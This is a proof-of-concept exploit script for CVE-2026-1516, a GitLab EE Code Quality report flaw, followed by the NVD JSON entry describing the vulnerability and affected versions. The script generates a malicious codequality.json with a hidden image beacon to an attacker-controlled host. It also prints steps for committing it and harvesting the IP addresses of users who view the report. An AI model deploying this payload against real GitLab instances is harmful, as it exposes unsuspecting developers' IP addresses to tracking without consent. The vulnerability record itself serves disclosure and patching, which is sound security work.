CVE-2026-1516

import json import requests # Target GitLab URL (Example) TARGET_URL = "https://gitlab.example.com/api/v4/projects/1/repository/files/codequality.json" PRIVATE_TOKEN = "glpat-xxxxxxxxxxxx" # Malicious payload designed to trigger an out-of-band connection # This assumes GitLab renders 'content' or 'description' fields allowing HTML/Markdown injection # which then loads an external resource controlled by the attacker. payload_data = [ { "type": "issue", "check_name": "Vulnerability/PoC", "description": "This is a crafted description to leak IP.", "content": { "body": "<img src=\"http://attacker-controlled-server.com/collect_ip?cve=CVE-2026-1516\" style=\"display:none\" />" }, "location": { "path": "src/vulnerable.py", "lines": { "begin": 1 } }, "severity": "critical" } ] def upload_poc(): headers = {"PRIVATE-TOKEN": PRIVATE_TOKEN} # Create file content file_content = json.dumps(payload_data) # In a real scenario, this would commit the file to the repo print("[+] Malicious Code Quality Report Payload Generated:") print(file_content) print("\n[+] Step to simulate attack:") print("1. Commit this JSON as 'codequality.json' in the project root.") print("2. Push to GitLab.") print("3. Wait for a user to view the Merge Request or Pipeline that includes this report.") print("4. Check logs at 'http://attacker-controlled-server.com' for captured IP addresses.") if __name__ == "__main__": upload_poc()

{"cve": {"id": "CVE-2026-1516", "sourceIdentifier": "[email protected]", "published": "2026-04-08T23:16:57.920", "lastModified": "2026-04-14T17:03:01.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.0.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that in Code Quality reports could have allowed an authenticated user to leak IP addresses of users viewing the report via specially crafted content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.0.0", "versionEndExcluding": "18.8.9", "matchCriteriaId": "E44C8A18-7C71-4626-85E4-9753A7039A03"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "3BA6A89D-D2C1-45B9-A8E8-64256816D880"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "BB2F3665-2451-4A4D-8538-93F540975F0E"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/587893", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3514461", "source": "[email protected]", "tags": ["Permissions Required"]}]}}